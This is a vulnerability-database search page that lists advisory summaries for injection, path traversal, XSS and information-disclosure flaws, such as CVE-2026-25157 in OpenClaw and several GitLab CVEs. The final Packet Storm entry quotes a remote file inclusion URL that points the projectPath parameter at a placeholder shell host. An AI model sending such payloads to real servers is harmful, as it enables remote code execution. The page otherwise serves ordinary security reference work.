Lucene search
K

35 matches found

Vulnrichment
Vulnrichment
added 2026/02/04 7:55 p.m.2 views

CVE-2026-25157 OpenClaw/Clawdbot has OS Command Injection via Project Root Path in sshNodeCommand

OpenClaw is a personal AI assistant. Prior to version 2026.1.29, there is an OS command injection vulnerability via the Project Root Path in sshNodeCommand. The sshNodeCommand function constructed a shell script without properly escaping the user-supplied project path in an error message. When th...

7.7CVSS5.9AI score0.00935EPSS
Exploits1References1
Positive Technologies
Positive Technologies
added 2026/02/04 12:0 a.m.7 views

PT-2026-6322

Name of the Vulnerable Software and Affected Versions Godot MCP versions prior to 0.1.1 Description Godot MCP is a Model Context Protocol MCP server for interacting with the Godot game engine. A command injection issue in godot-mcp allows remote code execution. The executeOperation function passe...

7.8CVSS6.5AI score0.00853EPSS
Exploits1References11
Cvelist
Cvelist
added 2025/09/29 8:41 a.m.9 views

CVE-2025-10344 HTML injection in Perfex CRM

HTML injection vulnerability in Perfex CRM v3.2.1 consisting of a stored HTML injection due to lack of proper validation of user input by sending a POST request in the parameters 'name' and 'clientid' at the endpoint '/projects/project/x'...

5.3CVSS0.00221EPSS
Exploits0References1
Tenable Nessus
Tenable Nessus
added 2025/08/27 12:0 a.m.6 views

Linux Distros Unpatched Vulnerability : CVE-2024-8974

The Linux/Unix host has one or more packages installed that are impacted by a vulnerability without a vendor supplied patch available. - Information disclosure in Gitlab EE/CE affecting all versions from 15.6 prior to 17.2.8, 17.3 prior to 17.3.4, and 17.4 prior to 17.4.1 in specific conditions i...

4.3CVSS5.4AI score0.00276EPSS
Exploits0References2
Cvelist
Cvelist
added 2024/12/04 10:20 p.m.19 views

CVE-2024-53982 Arbitrary file download in Zoo-Project Echo Example

ZOO-Project is a C-based WPS Web Processing Service implementation. A path traversal vulnerability was discovered in Zoo-Project Echo example. The Echo example available by default in Zoo installs implements file caching, which can be controlled by user-given parameters. No input validation is...

8.7CVSS0.0046EPSS
Exploits0References2
OSV
OSV
added 2024/09/30 8:53 a.m.117 views

BIT-GITLAB-2024-8974 Incorrect Provision of Specified Functionality in GitLab

Information disclosure in Gitlab EE/CE affecting all versions from 15.6 prior to 17.2.8, 17.3 prior to 17.3.4, and 17.4 prior to 17.4.1 in specific conditions it was possible to disclose to an unauthorised user the path of a private project."...

4.3CVSS4AI score0.00276EPSS
Exploits0References2
OSV
OSV
added 2024/09/26 11:15 p.m.4 views

UBUNTU-CVE-2024-8974

Information disclosure in Gitlab EE/CE affecting all versions from 15.6 prior to 17.2.8, 17.3 prior to 17.3.4, and 17.4 prior to 17.4.1 in specific conditions it was possible to disclose to an unauthorised user the path of a private project."...

4.3CVSS5.7AI score0.00276EPSS
Exploits0References3
Vulnrichment
Vulnrichment
added 2024/09/26 11:2 p.m.14 views

CVE-2024-8974 Incorrect Provision of Specified Functionality in GitLab

Information disclosure in Gitlab EE/CE affecting all versions from 15.6 prior to 17.2.8, 17.3 prior to 17.3.4, and 17.4 prior to 17.4.1 in specific conditions it was possible to disclose to an unauthorised user the path of a private project."...

2.6CVSS6.5AI score0.00276EPSS
Exploits0References1
Positive Technologies
Positive Technologies
added 2024/09/26 12:0 a.m.3 views

PT-2024-6704 · Gitlab · Gitlab

Name of the Vulnerable Software and Affected Versions: GitLab versions 15.6 through 17.2.7 GitLab versions 17.3 through 17.3.3 GitLab versions 17.4 through 17.4.0 Description: The issue is related to errors in representation of given functions in the GitLab platform, allowing a remote attacker to...

4.3CVSS6.9AI score0.00276EPSS
Exploits0References15
OSV
OSV
added 2024/02/14 3:15 p.m.4 views

CVE-2024-25222

Task Manager App v1.0 was discovered to contain a SQL injection vulnerability via the projectID parameter at /TaskManager/EditProject.php...

9.8CVSS5.8AI score
Exploits0References1
OSV
OSV
added 2020/01/28 3:15 a.m.3 views

UBUNTU-CVE-2019-15578

An information disclosure exists in 12.3.2, 12.2.6, and 12.1.12 for GitLab Community Edition CE and Enterprise Edition EE. The path of a private project, that used to be public, would be disclosed in the unsubscribe email link of issues and merge requests...

5.3CVSS5.8AI score0.01019EPSS
Exploits0References5
Debian CVE
Debian CVE
added 2020/01/28 2:46 a.m.19 views

CVE-2019-15578

Removed by vendor...

5.3CVSS6AI score0.01019EPSS
Exploits0
Tenable Nessus
Tenable Nessus
added 2019/10/03 12:0 a.m.61 views

FreeBSD : Gitlab -- Multiple Vulnerabilities (b17c86b9-e52e-11e9-86e9-001b217b3468)

SO-AND-SO reports : XSS in Markdown Preview Using Mermaid Bypass Email Verification using Salesforce Authentication Account Takeover using SAML Uncontrolled Resource Consumption in Markdown using Mermaid Disclosure of Private Project Path and Labels Disclosure of Assignees via Milestones Disclosu...

5.5CVSS7.6AI score0.00729EPSS
Exploits1References3
Atlassian
Atlassian
added 2013/01/02 4:17 a.m.44 views

Reflected xss in the jira-gadgets-plugin getLabelGroups rest resource

The jira-gadgets-plugin LabelsResource class exposes a getLabelGroups rest resource that is vulnerable to reflected xss through the user supplied 'project' path parameter. The vulnerability is caused by building an error response message with a content type of text/html and not html encoding the...

0.2AI score
Exploits0Affected Software1
Packet Storm
Packet Storm
added 2007/07/10 12:0 a.m.31 views

phpcomet-rfi.txt

Discovered by: MasTerX ---------------- Bug in : comet/example/gamedemo/inc.functions.php Vlu Code : include$projectPath."/inc.var.php"; http://site.com/path/example/gamedemo/inc.functions.php?projectPath=http://SHELLURL.COM?...

7.4AI score
Exploits0
Rows per page
Query Builder